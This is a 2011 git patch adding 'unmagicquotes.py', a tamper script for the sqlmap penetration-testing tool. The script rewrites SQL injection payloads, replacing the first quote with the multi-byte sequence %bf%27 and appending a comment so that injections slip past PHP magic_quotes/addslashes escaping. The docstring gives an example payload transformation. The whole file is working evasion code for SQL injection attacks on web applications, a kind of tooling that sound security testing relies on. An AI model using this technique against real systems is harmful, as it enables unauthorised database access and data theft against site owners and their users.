From 793f1d777452fa4327baefb421c05f751769b554 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 29 Aug 2011 15:42:01 +0000
Subject: [PATCH] new tampering script

---
 tamper/unmagicquotes.py | 56 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 tamper/unmagicquotes.py

diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
new file mode 100644
index 000000000..2e91acb1f
--- /dev/null
+++ b/tamper/unmagicquotes.py
@@ -0,0 +1,56 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+import os
+import random
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
+
+    Example:
+        * Input: 1' AND 1=1
+        * Output: 1%bf%27 AND 1=1--%20
+
+    Notes:
+        * Useful for bypassing magic_quotes/addslashes feature
+
+    Reference:
+        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
+    """
+
+    retVal = payload
+
+    if payload:
+        found = False
+        retVal = ""
+
+        for i in xrange(len(payload)):
+            if payload[i] == '\'' and not found:
+                retVal += "%bf%27"
+                found = True
+            else:
+                retVal += payload[i]
+                continue
+
+        if found:
+            retVal = re.sub("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal)
+            retVal += "-- "
+
+    return retVal